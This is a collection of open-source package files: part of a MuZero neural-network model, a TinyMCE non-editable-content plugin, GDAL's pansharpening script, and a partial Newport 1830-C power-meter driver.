dynamics/prediction mlp, default set it to True.
- state_norm (:obj:`bool`): Whether to use normalization for hidden states, default set it to False.
- downsample (:obj:`bool`): Whether to do downsampling for observations in ``representation_network``, \
defaults to True. This option is often used in video games like Atari. In board games like go, \
we don't need this module.
"""
super(MuZeroModel, self).__init__()
if isinstance(observation_shape, int) or len(observation_shape) == 1:
# for vector obs input, e.g. classical control and box2d environments
# to be compatible with LightZero model/policy, transform to shape: [C, W, H]
observation_shape = [1, observation_shape, 1]
self.categorical_distribution = categorical_distribution
if self.categorical_distribution:
self.reward_support_size = reward_support_size
self.value_support_size = value_support_size
else:
self.reward_support_size = 1
self.value_support_size = 1
self.action_space_size = action_space_size
self.proj_hid = proj_hid
self.proj_out = proj_out
self.pred_hid = pred_hid
self.pred_out = pred_out
self.self_supervised_learning_loss = self_supervised_learning_loss
self.last_linear_layer_init_zero = last_linear_layer_init_zero
self.state_norm = state_norm
self.downsample = downsample
flatten_output_size_for_reward_head = (
(reward_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(reward_head_channels * observation_shape[1] * observation_shape[2])
)
flatten_output_size_for_value_head = (
(value_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(value_head_channels * observation_shape[1] * observation_shape[2])
)
flatten_output_size_for_policy_head = (
(policy_head_channels * math.ceil(observation_shape[1] / 16) *
math.ceil(observation_shape[2] / 16)) if downsample else
(policy_head_channels * observation_shape[1] * observation_shape[2])
)
self.representation_network = RepresentationNetwork(
observation_shape,
num_res_blocks,
num_channels,
downsample,
)
self.dynamics_network = DynamicsNetwork(
num_res_blocks,
num_channels + 1,
reward_head_channels,
fc_reward_layers,
self.reward_support_size,
flatten_output_size_for_reward_head,
last_linear_layer_init_zero=self.last_linear_layer_init_zero,
)
self.prediction_network = PredictionNetwork(
action_space_size,
num_res_blocks,
num_channels,
value_head_channels,
policy_head_channels,
fc_value_layers,
fc_policy_layers,
self.value_support_size,
flatten_output_size_for_value_head,
flatten_output_size_for_policy_head,
last_linear_layer_init_zero=self.last_linear_layer_init_zero,
)
if self.self_supervised_learning_loss:
# projection used in EfficientZero
if self.downsample:
# In Atari, if the observation_shape is set to (12, 96, 96), which indicates the original shape of
# (3,96,96), and frame_stack_num is 4. Due to downsample, the encoding of observation (latent_state) is
# (64, 96/16, 96/16), where 64 is the number of channels, 96/16 is the size of the latent state. Thus,
# self.projection_input_dim = 64 * 96/16 * 96/16 = 64*6*6 = 2304
ceil_size = math.ceil(observation_shape[1] / 16) * math.ceil(observation_shape[2] / 16)
self.projection_input_dim = num_channels * ceil_size
else:
self.projection_input_dim = num_channels * observation_shape[1] * observation_shape[2]
self.projection = nn.Sequential(
nn.Linear(self.projection_input_dim, self.proj_hid), nn.BatchNorm1d(self.proj_hid), activation,
nn.Linear(self.proj_hid, self.proj_hid), nn.BatchNorm1d(self.proj_hid), activation,
nn.Linear(self.proj_hid, self.proj_out), nn.BatchNorm1d(self.proj_out)
)
self.prediction_head = nn.Sequential(
nn.Linear(self.proj_out, self.pred_hid),
nn.BatchNorm1d(self.pred_hid),
activation,
nn.Linear(self.pred_hid, self.pred_out),
)
def initial_inference(self, obs: torch.Tensor) -> MZNetworkOutput:
"""
Overview:
Initial inference of MuZero model, which is the first step of the MuZero model.
To perform the initial inference, we first use the representation network to obtain the ``latent_state``.
Then we use the prediction network to predict ``value`` and ``policy_logits`` of the ``latent_state``.
Arguments:
- obs (:obj:`torch.Tensor`): The 2D image observation data.
Returns (MZNetworkOutput):
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
- reward (:obj:`torch.Tensor`): The predicted reward of input state and selected action. \
In initial inference, we set it to zero vector.
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
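
        Examples:
            >>> # Illustrative only, assuming ``model`` is a MuZeroModel with
            >>> # downsample=True, num_channels=64 and observation_shape (12, 96, 96).
            >>> obs = torch.randn(8, 12, 96, 96)
            >>> output = model.initial_inference(obs)
            >>> output.latent_state.shape  # torch.Size([8, 64, 6, 6])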
"""
batch_size = obs.size(0)
latent_state = self._representation(obs)
policy_logits, value = self._prediction(latent_state)
return MZNetworkOutput(
value,
[0. for _ in range(batch_size)],
policy_logits,
latent_state,
)
def recurrent_inference(self, latent_state: torch.Tensor, action: torch.Tensor) -> MZNetworkOutput:
"""
Overview:
Recurrent inference of MuZero model, which is the rollout step of the MuZero model.
To perform the recurrent inference, we first use the dynamics network to predict ``next_latent_state``,
``reward``, by the given current ``latent_state`` and ``action``.
We then use the prediction network to predict the ``value`` and ``policy_logits`` of the current
``latent_state``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- action (:obj:`torch.Tensor`): The predicted action to rollout.
Returns (MZNetworkOutput):
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
- reward (:obj:`torch.Tensor`): The predicted reward of input state and selected action.
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- next_latent_state (:obj:`torch.Tensor`): The predicted next latent state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- action (:obj:`torch.Tensor`): :math:`(B, )`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- next_latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
"""
next_latent_state, reward = self._dynamics(latent_state, action)
policy_logits, value = self._prediction(next_latent_state)
return MZNetworkOutput(value, reward, policy_logits, next_latent_state)
def _representation(self, observation: torch.Tensor) -> torch.Tensor:
"""
Overview:
Use the representation network to encode the observations into latent state.
Arguments:
- obs (:obj:`torch.Tensor`): The 2D image observation data.
Returns:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Shapes:
- obs (:obj:`torch.Tensor`): :math:`(B, num_channel, obs_shape[1], obs_shape[2])`, where B is batch_size.
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
"""
latent_state = self.representation_network(observation)
if self.state_norm:
latent_state = renormalize(latent_state)
return latent_state
def _prediction(self, latent_state: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
Use the prediction network to predict ``policy_logits`` and ``value``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
Returns:
- policy_logits (:obj:`torch.Tensor`): The output logit to select discrete action.
- value (:obj:`torch.Tensor`): The output value of input state to help policy improvement and evaluation.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- policy_logits (:obj:`torch.Tensor`): :math:`(B, action_dim)`, where B is batch_size.
- value (:obj:`torch.Tensor`): :math:`(B, value_support_size)`, where B is batch_size.
"""
return self.prediction_network(latent_state)
def _dynamics(self, latent_state: torch.Tensor, action: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
Concatenate ``latent_state`` and ``action`` and use the dynamics network to predict ``next_latent_state``
and ``reward``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- action (:obj:`torch.Tensor`): The predicted action to rollout.
Returns:
- next_latent_state (:obj:`torch.Tensor`): The predicted latent state of the next timestep.
- reward (:obj:`torch.Tensor`): The predicted reward of the current latent state and selected action.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- action (:obj:`torch.Tensor`): :math:`(B, )`, where B is batch_size.
- next_latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- reward (:obj:`torch.Tensor`): :math:`(B, reward_support_size)`, where B is batch_size.
"""
# NOTE: the discrete action encoding type is important for some environments
# discrete action space
# the final action_encoding shape is (batch_size, 1, latent_state[2], latent_state[3]), e.g. (8, 1, 4, 1).
action_encoding = (
torch.ones((
latent_state.shape[0],
1,
latent_state.shape[2],
latent_state.shape[3],
)).to(action.device).float()
)
if len(action.shape) == 2:
# (batch_size, action_dim) -> (batch_size, action_dim, 1)
# e.g., torch.Size([8, 1]) -> torch.Size([8, 1, 1])
action = action.unsqueeze(-1)
elif len(action.shape) == 1:
# (batch_size,) -> (batch_size, action_dim=1, 1)
            # e.g., torch.Size([8]) -> torch.Size([8, 1, 1])
action = action.unsqueeze(-1).unsqueeze(-1)
# action[:, 0, None, None] shape: (batch_size, action_dim, 1, 1) e.g. (8, 1, 1, 1)
# the final action_encoding shape: (batch_size, 1, latent_state[2], latent_state[3]) e.g. (8, 1, 4, 1),
# where each element is normalized as action[i]/action_space_size
action_encoding = (action[:, 0, None, None] * action_encoding / self.action_space_size)
# state_action_encoding shape: (batch_size, latent_state[1] + 1, latent_state[2], latent_state[3])
state_action_encoding = torch.cat((latent_state, action_encoding), dim=1)
next_latent_state, reward = self.dynamics_network(state_action_encoding)
if self.state_norm:
next_latent_state = renormalize(next_latent_state)
return next_latent_state, reward
def project(self, latent_state: torch.Tensor, with_grad: bool = True) -> torch.Tensor:
"""
Overview:
            Project the latent state to a lower dimension to calculate the self-supervised loss, a technique that
            EfficientZero adds on top of the MuZero algorithm.
For more details, please refer to paper ``Exploring Simple Siamese Representation Learning``.
Arguments:
- latent_state (:obj:`torch.Tensor`): The encoding latent state of input state.
- with_grad (:obj:`bool`): Whether to calculate gradient for the projection result.
Returns:
- proj (:obj:`torch.Tensor`): The result embedding vector of projection operation.
Shapes:
- latent_state (:obj:`torch.Tensor`): :math:`(B, H_, W_)`, where B is batch_size, H_ is the height of \
latent state, W_ is the width of latent state.
- proj (:obj:`torch.Tensor`): :math:`(B, projection_output_dim)`, where B is batch_size.
Examples:
>>> latent_state = torch.randn(256, 64, 6, 6)
>>> output = self.project(latent_state)
>>> output.shape # (256, 1024)
.. note::
for Atari:
observation_shape = (12, 96, 96), # original shape is (3,96,96), frame_stack_num=4
if downsample is True, latent_state.shape: (batch_size, num_channel, obs_shape[1] / 16, obs_shape[2] / 16)
i.e., (256, 64, 96 / 16, 96 / 16) = (256, 64, 6, 6)
latent_state reshape: (256, 64, 6, 6) -> (256,64*6*6) = (256, 2304)
# self.projection_input_dim = 64*6*6 = 2304
# self.projection_output_dim = 1024
"""
latent_state = latent_state.reshape(latent_state.shape[0], -1)
proj = self.projection(latent_state)
if with_grad:
# with grad, use prediction_head
return self.prediction_head(proj)
else:
return proj.detach()
def get_params_mean(self) -> float:
return get_params_mean(self)
class DynamicsNetwork(nn.Module):
def __init__(
self,
num_res_blocks: int,
num_channels: int,
reward_head_channels: int,
fc_reward_layers: SequenceType,
output_support_size: int,
flatten_output_size_for_reward_head: int,
last_linear_layer_init_zero: bool = True,
activation: Optional[nn.Module] = nn.ReLU(inplace=True),
):
"""
Overview:
The definition of dynamics network in MuZero algorithm, which is used to predict next latent state and
reward given current latent state and action.
Arguments:
            - num_res_blocks (:obj:`int`): The number of res blocks in the dynamics network.
- num_channels (:obj:`int`): The channels of input, including obs and action encoding.
- reward_head_channels (:obj:`int`): The channels of reward head.
- fc_reward_layers (:obj:`SequenceType`): The number of hidden layers of the reward head (MLP head).
- output_support_size (:obj:`int`): The size of categorical reward output.
- flatten_output_size_for_reward_head (:obj:`int`): The flatten size of output for reward head, i.e., \
the input size of reward head.
            - last_linear_layer_init_zero (:obj:`bool`): Whether to use zero initialization for the last layer of \
                the reward MLP, defaults to True.
- activation (:obj:`Optional[nn.Module]`): Activation function used in network, which often use in-place \
operation to speedup, e.g. ReLU(inplace=True).
"""
super().__init__()
self.num_channels = num_channels
self.flatten_output_size_for_reward_head = flatten_output_size_for_reward_head
self.conv = nn.Conv2d(num_channels, num_channels - 1, kernel_size=3, stride=1, padding=1, bias=False)
self.bn = nn.BatchNorm2d(num_channels - 1)
self.resblocks = nn.ModuleList(
[
ResBlock(
in_channels=num_channels - 1, activation=activation, norm_type='BN', res_type='basic', bias=False
) for _ in range(num_res_blocks)
]
)
self.conv1x1_reward = nn.Conv2d(num_channels - 1, reward_head_channels, 1)
self.bn_reward = nn.BatchNorm2d(reward_head_channels)
self.fc_reward_head = MLP(
self.flatten_output_size_for_reward_head,
hidden_channels=fc_reward_layers[0],
layer_num=len(fc_reward_layers) + 1,
out_channels=output_support_size,
activation=activation,
norm_type='BN',
output_activation=nn.Identity(),
output_norm_type=None,
last_linear_layer_init_zero=last_linear_layer_init_zero
)
self.activation = activation
def forward(self, state_action_encoding: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Overview:
            Forward computation of the dynamics network. Predict the next latent state and reward given the
            current state-action encoding.
Arguments:
- state_action_encoding (:obj:`torch.Tensor`): The state-action encoding, which is the concatenation of \
latent state and action encoding, with shape (batch_size, num_channels, height, width).
Returns:
- next_latent_state (:obj:`torch.Tensor`): The next latent state, with shape (batch_size, num_channels, \
height, width).
- reward (:obj:`torch.Tensor`): The predicted reward, with shape (batch_size, output_support_size).
"""
# take the state encoding (latent_state), state_action_encoding[:, -1, :, :] is action encoding
latent_state = state_action_encoding[:, :-1, :, :]
x = self.conv(state_action_encoding)
x = self.bn(x)
# the residual link: add state encoding to the state_action encoding
x += latent_state
x = self.activation(x)
for block in self.resblocks:
x = block(x)
next_latent_state = x
x = self.conv1x1_reward(next_latent_state)
x = self.bn_reward(x)
x = self.activation(x)
x = x.view(-1, self.flatten_output_size_for_reward_head)
# use the fully connected layer to predict reward
reward = self.fc_reward_head(x)
return next_latent_state, reward
def get_dynamic_mean(self) -> float:
return get_dynamic_mean(self)
def get_reward_mean(self) -> float:
return get_reward_mean(self) | PypiClean |
/GeoNode-3.2.0-py3-none-any.whl/geonode/static/lib/js/plugins/noneditable/plugin.js | (function () {
'use strict';
var global = tinymce.util.Tools.resolve('tinymce.PluginManager');
var global$1 = tinymce.util.Tools.resolve('tinymce.util.Tools');
var getNonEditableClass = function (editor) {
return editor.getParam('noneditable_noneditable_class', 'mceNonEditable');
};
var getEditableClass = function (editor) {
return editor.getParam('noneditable_editable_class', 'mceEditable');
};
var getNonEditableRegExps = function (editor) {
var nonEditableRegExps = editor.getParam('noneditable_regexp', []);
if (nonEditableRegExps && nonEditableRegExps.constructor === RegExp) {
return [nonEditableRegExps];
} else {
return nonEditableRegExps;
}
};
var hasClass = function (checkClassName) {
return function (node) {
return (' ' + node.attr('class') + ' ').indexOf(checkClassName) !== -1;
};
};
var replaceMatchWithSpan = function (editor, content, cls) {
return function (match) {
var args = arguments, index = args[args.length - 2];
var prevChar = index > 0 ? content.charAt(index - 1) : '';
if (prevChar === '"') {
return match;
}
if (prevChar === '>') {
var findStartTagIndex = content.lastIndexOf('<', index);
if (findStartTagIndex !== -1) {
var tagHtml = content.substring(findStartTagIndex, index);
if (tagHtml.indexOf('contenteditable="false"') !== -1) {
return match;
}
}
}
return '<span class="' + cls + '" data-mce-content="' + editor.dom.encode(args[0]) + '">' + editor.dom.encode(typeof args[1] === 'string' ? args[1] : args[0]) + '</span>';
};
};
var convertRegExpsToNonEditable = function (editor, nonEditableRegExps, e) {
var i = nonEditableRegExps.length, content = e.content;
if (e.format === 'raw') {
return;
}
while (i--) {
content = content.replace(nonEditableRegExps[i], replaceMatchWithSpan(editor, content, getNonEditableClass(editor)));
}
e.content = content;
};
var setup = function (editor) {
var editClass, nonEditClass;
var contentEditableAttrName = 'contenteditable';
editClass = ' ' + global$1.trim(getEditableClass(editor)) + ' ';
nonEditClass = ' ' + global$1.trim(getNonEditableClass(editor)) + ' ';
var hasEditClass = hasClass(editClass);
var hasNonEditClass = hasClass(nonEditClass);
var nonEditableRegExps = getNonEditableRegExps(editor);
editor.on('PreInit', function () {
if (nonEditableRegExps.length > 0) {
editor.on('BeforeSetContent', function (e) {
convertRegExpsToNonEditable(editor, nonEditableRegExps, e);
});
}
editor.parser.addAttributeFilter('class', function (nodes) {
var i = nodes.length, node;
while (i--) {
node = nodes[i];
if (hasEditClass(node)) {
node.attr(contentEditableAttrName, 'true');
} else if (hasNonEditClass(node)) {
node.attr(contentEditableAttrName, 'false');
}
}
});
editor.serializer.addAttributeFilter(contentEditableAttrName, function (nodes) {
var i = nodes.length, node;
while (i--) {
node = nodes[i];
if (!hasEditClass(node) && !hasNonEditClass(node)) {
continue;
}
if (nonEditableRegExps.length > 0 && node.attr('data-mce-content')) {
node.name = '#text';
node.type = 3;
node.raw = true;
node.value = node.attr('data-mce-content');
} else {
node.attr(contentEditableAttrName, null);
}
}
});
});
};
function Plugin () {
global.add('noneditable', function (editor) {
setup(editor);
});
}
Plugin();
}()); | PypiClean |
/MFD%20Floods-0.1.14.tar.gz/MFD Floods-0.1.14/bin/gdal_pansharpen.py |
import os
import os.path
import sys
from osgeo import gdal
def DoesDriverHandleExtension(drv, ext):
exts = drv.GetMetadataItem(gdal.DMD_EXTENSIONS)
return exts is not None and exts.lower().find(ext.lower()) >= 0
def GetExtension(filename):
ext = os.path.splitext(filename)[1]
if ext.startswith('.'):
ext = ext[1:]
return ext
def GetOutputDriversFor(filename):
drv_list = []
ext = GetExtension(filename)
for i in range(gdal.GetDriverCount()):
drv = gdal.GetDriver(i)
if (drv.GetMetadataItem(gdal.DCAP_CREATE) is not None or
drv.GetMetadataItem(gdal.DCAP_CREATECOPY) is not None) and \
drv.GetMetadataItem(gdal.DCAP_RASTER) is not None:
if ext and DoesDriverHandleExtension(drv, ext):
drv_list.append(drv.ShortName)
else:
prefix = drv.GetMetadataItem(gdal.DMD_CONNECTION_PREFIX)
if prefix is not None and filename.lower().startswith(prefix.lower()):
drv_list.append(drv.ShortName)
# GMT is registered before netCDF for opening reasons, but we want
# netCDF to be used by default for output.
    if ext.lower() == 'nc' and len(drv_list) >= 2 and \
       drv_list[0].upper() == 'GMT' and drv_list[1].upper() == 'NETCDF':
drv_list = ['NETCDF', 'GMT']
return drv_list
def GetOutputDriverFor(filename):
drv_list = GetOutputDriversFor(filename)
ext = GetExtension(filename)
if not drv_list:
if not ext:
return 'GTiff'
else:
raise Exception("Cannot guess driver for %s" % filename)
elif len(drv_list) > 1:
print("Several drivers matching %s extension. Using %s" % (ext if ext else '', drv_list[0]))
return drv_list[0]
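
# Example (illustrative): GetOutputDriverFor('out.tif') typically returns
# 'GTiff', and a filename without any extension also falls back to 'GTiff'.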
def Usage():
print('Usage: gdal_pansharpen [--help-general] pan_dataset {spectral_dataset[,band=num]}+ out_dataset')
print(' [-of format] [-b band]* [-w weight]*')
print(' [-r {nearest,bilinear,cubic,cubicspline,lanczos,average}]')
print(' [-threads {ALL_CPUS|number}] [-bitdepth val] [-nodata val]')
print(' [-spat_adjust {union,intersection,none,nonewithoutwarning}]')
print(' [-verbose_vrt] [-co NAME=VALUE]* [-q]')
print('')
print('Create a dataset resulting from a pansharpening operation.')
return -1
def gdal_pansharpen(argv):
argv = gdal.GeneralCmdLineProcessor(argv)
if argv is None:
return -1
pan_name = None
last_name = None
spectral_ds = []
spectral_bands = []
out_name = None
bands = []
weights = []
frmt = None
creation_options = []
callback = gdal.TermProgress_nocb
resampling = None
spat_adjust = None
verbose_vrt = False
num_threads = None
bitdepth = None
nodata = None
i = 1
argc = len(argv)
while i < argc:
if (argv[i] == '-of' or argv[i] == '-f') and i < len(argv) - 1:
frmt = argv[i + 1]
i = i + 1
elif argv[i] == '-r' and i < len(argv) - 1:
resampling = argv[i + 1]
i = i + 1
elif argv[i] == '-spat_adjust' and i < len(argv) - 1:
spat_adjust = argv[i + 1]
i = i + 1
elif argv[i] == '-b' and i < len(argv) - 1:
bands.append(int(argv[i + 1]))
i = i + 1
elif argv[i] == '-w' and i < len(argv) - 1:
weights.append(float(argv[i + 1]))
i = i + 1
elif argv[i] == '-co' and i < len(argv) - 1:
creation_options.append(argv[i + 1])
i = i + 1
elif argv[i] == '-threads' and i < len(argv) - 1:
num_threads = argv[i + 1]
i = i + 1
elif argv[i] == '-bitdepth' and i < len(argv) - 1:
bitdepth = argv[i + 1]
i = i + 1
elif argv[i] == '-nodata' and i < len(argv) - 1:
nodata = argv[i + 1]
i = i + 1
elif argv[i] == '-q':
callback = None
elif argv[i] == '-verbose_vrt':
verbose_vrt = True
elif argv[i][0] == '-':
sys.stderr.write('Unrecognized option : %s\n' % argv[i])
return Usage()
elif pan_name is None:
pan_name = argv[i]
pan_ds = gdal.Open(pan_name)
if pan_ds is None:
return 1
else:
if last_name is not None:
pos = last_name.find(',band=')
if pos > 0:
spectral_name = last_name[0:pos]
ds = gdal.Open(spectral_name)
if ds is None:
return 1
band_num = int(last_name[pos + len(',band='):])
band = ds.GetRasterBand(band_num)
spectral_ds.append(ds)
spectral_bands.append(band)
else:
spectral_name = last_name
ds = gdal.Open(spectral_name)
if ds is None:
return 1
for j in range(ds.RasterCount):
spectral_ds.append(ds)
spectral_bands.append(ds.GetRasterBand(j + 1))
last_name = argv[i]
i = i + 1
if pan_name is None or not spectral_bands:
return Usage()
out_name = last_name
if frmt is None:
frmt = GetOutputDriverFor(out_name)
if not bands:
bands = [j + 1 for j in range(len(spectral_bands))]
else:
for band in bands:
if band < 0 or band > len(spectral_bands):
print('Invalid band number in -b: %d' % band)
return 1
if weights and len(weights) != len(spectral_bands):
print('There must be as many -w values specified as input spectral bands')
return 1
vrt_xml = """<VRTDataset subClass="VRTPansharpenedDataset">\n"""
if bands != [j + 1 for j in range(len(spectral_bands))]:
for i, band in enumerate(bands):
sband = spectral_bands[band - 1]
datatype = gdal.GetDataTypeName(sband.DataType)
colorname = gdal.GetColorInterpretationName(sband.GetColorInterpretation())
vrt_xml += """ <VRTRasterBand dataType="%s" band="%d" subClass="VRTPansharpenedRasterBand">
<ColorInterp>%s</ColorInterp>
</VRTRasterBand>\n""" % (datatype, i + 1, colorname)
vrt_xml += """ <PansharpeningOptions>\n"""
if weights:
vrt_xml += """ <AlgorithmOptions>\n"""
vrt_xml += """ <Weights>"""
for i, weight in enumerate(weights):
if i > 0:
vrt_xml += ","
vrt_xml += "%.16g" % weight
vrt_xml += "</Weights>\n"
vrt_xml += """ </AlgorithmOptions>\n"""
if resampling is not None:
vrt_xml += ' <Resampling>%s</Resampling>\n' % resampling
if num_threads is not None:
vrt_xml += ' <NumThreads>%s</NumThreads>\n' % num_threads
if bitdepth is not None:
vrt_xml += ' <BitDepth>%s</BitDepth>\n' % bitdepth
if nodata is not None:
vrt_xml += ' <NoData>%s</NoData>\n' % nodata
if spat_adjust is not None:
vrt_xml += ' <SpatialExtentAdjustment>%s</SpatialExtentAdjustment>\n' % spat_adjust
pan_relative = '0'
if frmt.upper() == 'VRT':
if not os.path.isabs(pan_name):
pan_relative = '1'
pan_name = os.path.relpath(pan_name, os.path.dirname(out_name))
vrt_xml += """ <PanchroBand>
<SourceFilename relativeToVRT="%s">%s</SourceFilename>
<SourceBand>1</SourceBand>
</PanchroBand>\n""" % (pan_relative, pan_name)
for i, sband in enumerate(spectral_bands):
dstband = ''
for j, band in enumerate(bands):
if i + 1 == band:
dstband = ' dstBand="%d"' % (j + 1)
break
ms_relative = '0'
ms_name = spectral_ds[i].GetDescription()
if frmt.upper() == 'VRT':
if not os.path.isabs(ms_name):
ms_relative = '1'
ms_name = os.path.relpath(ms_name, os.path.dirname(out_name))
vrt_xml += """ <SpectralBand%s>
<SourceFilename relativeToVRT="%s">%s</SourceFilename>
<SourceBand>%d</SourceBand>
</SpectralBand>\n""" % (dstband, ms_relative, ms_name, sband.GetBand())
vrt_xml += """ </PansharpeningOptions>\n"""
vrt_xml += """</VRTDataset>\n"""
if frmt.upper() == 'VRT':
f = gdal.VSIFOpenL(out_name, 'wb')
if f is None:
print('Cannot create %s' % out_name)
return 1
gdal.VSIFWriteL(vrt_xml, 1, len(vrt_xml), f)
gdal.VSIFCloseL(f)
if verbose_vrt:
vrt_ds = gdal.Open(out_name, gdal.GA_Update)
vrt_ds.SetMetadata(vrt_ds.GetMetadata())
else:
vrt_ds = gdal.Open(out_name)
if vrt_ds is None:
return 1
return 0
vrt_ds = gdal.Open(vrt_xml)
out_ds = gdal.GetDriverByName(frmt).CreateCopy(out_name, vrt_ds, 0, creation_options, callback=callback)
if out_ds is None:
return 1
return 0
def main():
return gdal_pansharpen(sys.argv)
if __name__ == '__main__':
sys.exit(gdal_pansharpen(sys.argv)) | PypiClean |
/Instrumental-lib-0.7.zip/Instrumental-lib-0.7/instrumental/drivers/powermeters/newport.py | import time
from . import PowerMeter
from .. import Facet, MessageFacet, VisaMixin, deprecated
from ..util import visa_timeout_context
from ... import Q_, u
def _check_visa_support(visa_inst):
with visa_timeout_context(visa_inst, 100):
try:
if int(visa_inst.query('Z?')) in (0, 1):
return 'Newport_1830_C'
        except Exception:
pass
return None
def MyFacet(msg, readonly=False, **kwds):
"""Like SCPI_Facet, but without a space before the set-value"""
get_msg = msg + '?'
set_msg = None if readonly else (msg + '{}')
return MessageFacet(get_msg, set_msg, convert=int, **kwds)
class Newport_1830_C(PowerMeter, VisaMixin):
"""A Newport 1830-C power meter"""
_INST_PRIORITY_ = 8 # IDN isn't supported
_INST_PARAMS_ = ['visa_address']
# Status byte codes
_PARAM_ERROR = 1
_COMMAND_ERROR = 2
_SATURATED = 4
_OUT_OF_RANGE = 8
_MSG_AVAILABLE = 16
_BUSY = 32
_SERVICE_REQUEST = 64
_READY_READING = 128
# Filter averaging constants
SLOW_FILTER = 1
MEDIUM_FILTER = 2
NO_FILTER = 3
def _initialize(self):
self._rsrc.read_termination = '\n'
self._rsrc.write_termination = '\n'
def close(self):
self.local_lockout = False
status_byte = MyFacet('Q', readonly=True)
@deprecated('status_byte')
def get_status_byte(self):
"""Query the status byte register and return it as an int"""
return self.status_byte
@Facet(units='W', cached=False)
def power(self):
"""Get the current power measurement
Returns
-------
power : Quantity
Power in units of watts, regardless of the power meter's current
'units' setting.
"""
original_units = self.query('U?')
if original_units != '1':
self.write('U1') # Measure in watts
power = float(self.query('D?'))
self.write('U' + original_units)
else:
power = float(self.query('D?'))
return Q_(power, 'watts')
@deprecated('power')
def get_power(self):
return self.power
range = MyFacet('R', doc="The current input range, [1-8], where 1 is lowest signal.")
def enable_auto_range(self):
"""Enable auto-range"""
self.set_range(0)
def disable_auto_range(self):
"""Disable auto-range
Leaves the signal range at its current position.
"""
cur_range = self.get_range()
self.set_range(cur_range)
@deprecated('range')
def set_range(self, range_num):
"""Set the range for power measurements
range_num = 0 for auto-range
range_num = 1 to 8 for manual signal range
(1 is lowest, and 8 is highest)
Parameters
----------
n : int
Sets the signal range for the input signal.
"""
self.range = range_num
@deprecated('range')
def get_range(self):
"""Return the current range setting as an int
1 corresponds to the lowest range, while 8 is the highest range (least
amplifier gain).
Note that this does not query the status of auto-range.
Returns
-------
range : int
the current range setting. Possible values are from 1-8.
"""
return self.range
wavelength = MyFacet('W', units='nm')
@deprecated('wavelength')
def set_wavelength(self, wavelength):
"""Set the input signal wavelength setting
Parameters
----------
wavelength : Quantity
wavelength of the input signal, in units of [length]
"""
self.wavelength = wavelength
@deprecated('wavelength')
def get_wavelength(self):
"""Get the input wavelength setting"""
return self.wavelength
attenuator = MyFacet('A', value={False:0, True:1}, doc="Whether the attenuator is enabled")
@deprecated('attenuator')
def enable_attenuator(self, enabled=True):
"""Enable the power meter attenuator"""
self.write('A{}', int(enabled))
@deprecated('attenuator')
def disable_attenuator(self):
"""Disable the power meter attenuator"""
self.enable_attenuator(False)
@deprecated('attenuator')
def attenuator_enabled(self):
"""Whether the attenuator is enabled
Returns
-------
enabled : bool
whether the attenuator is enabled
"""
        val = int(self.query('A?'))
        return bool(val)
def get_valid_power(self, max_attempts=10, polling_interval=0.1*u.s):
"""Returns a valid power reading
        This convenience function will try to measure a valid power up to a
        maximum of `max_attempts` times, pausing for `polling_interval`
        between attempts.
If a power reading is taken when the power meter is over-range,
saturated, or busy, the reading will be invalid.
In practice, this function also seems to mitigate
the fact that about 1 in 500 power readings mysteriously fails.
Parameters
----------
max_attempts : integer
maximum number of attempts to measure a valid power
polling_interval : Quantity
            time to wait between measurement attempts, in units of time
Returns
-------
power : Quantity
Power in units of watts, regardless of the power meter's current
'units' setting.
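
        Example
        -------
        A minimal sketch, assuming ``meter`` is an already-opened
        ``Newport_1830_C`` instance::

            power = meter.get_valid_power(max_attempts=5)
            print(power.to('mW'))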
"""
self.enable_auto_range()
i_attempts = 0
is_valid = False
while not is_valid:
self.disable_hold()
time.sleep(polling_interval.to('s').m)
self.enable_hold()
i_attempts += 1
try:
is_valid = self.is_measurement_valid()
if is_valid:
power = self.power
self.disable_hold()
return power
except:
is_valid = False
if i_attempts > max_attempts:
self.disable_hold()
